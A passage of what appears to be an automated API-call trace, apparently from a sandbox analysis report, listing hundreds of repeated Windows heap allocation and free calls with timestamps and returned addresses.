() returned 0xe30000 [0124.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0124.114] GetProcessHeap () returned 0xe30000 [0124.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.115] GetProcessHeap () returned 0xe30000 [0124.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.116] GetProcessHeap () returned 0xe30000 [0124.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.116] GetProcessHeap () returned 0xe30000 [0124.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0124.117] GetProcessHeap () returned 0xe30000 [0124.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.118] GetProcessHeap () returned 0xe30000 [0124.118] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0124.119] GetProcessHeap () returned 0xe30000 [0124.119] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.120] GetProcessHeap () returned 0xe30000 [0124.120] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.121] GetProcessHeap () returned 0xe30000 [0124.121] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.122] GetProcessHeap () returned 0xe30000 [0124.122] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] 